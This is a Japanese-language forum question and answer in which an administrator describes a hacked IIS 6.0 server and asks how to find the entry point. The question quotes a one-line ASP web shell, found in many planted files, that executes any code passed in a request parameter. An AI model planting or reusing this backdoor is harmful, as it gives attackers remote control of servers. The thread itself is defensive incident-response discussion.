1

私のクライアントの 1 人が、ウェブサイトがハッキングされた可能性があるというメッセージが Google 検索結果に表示されていることに気付きました。掘り下げた後、seoガベージとjavascript参照を含むhtmlファイルがサーバー上に見つかりました。これらのファイルを削除し、cms パスワードを変更し、CKFinder などのコンポーネントを更新しました...

次に、サーバー上の他のサイトを調べ始めたところ、この行を含む大量の.aspファイルが見つかりました

<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile

それらを削除しましたが、どうやってそこにたどり着いたのかわかりません。さまざまなログ (イベント ビューアー、Web サイト、ftp) を調べましたが、ほとんどの場合、ファイルが作成された時点から十分に遡ることができません。

1、2 か月しか更新されていない OS を更新し、ftp アクセスを変更しました。

エントリポイントを見つけたり、サーバーとサイトが安全であることを確認したりするには、他に何ができますか?

ところで: これは IIS 6.0 を実行している Windows 2003 サーバーです。

4

1 に答える 1

0

彼らがあなたのサーバーにアクセスする方法はいくつかあります。

一般的な CMS またはカスタムを実行していますか? スクリプトの 1 つに脆弱性が見つかった可能性があります。

たとえば、SQL インジェクションの脆弱性を発見した場合、データベース情報を取得できます。RCE バグ (リモート コード実行) を見つけた場合、それらの任意のファイルの作成につながるシステム コマンドを実行できた可能性があります。

それ以外にも、今週パッチが適用された Windows サーバーの脆弱性がいくつかあります。このリンクをチェックしてください: http://blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html

于 2014-02-27T01:34:59.147 に答える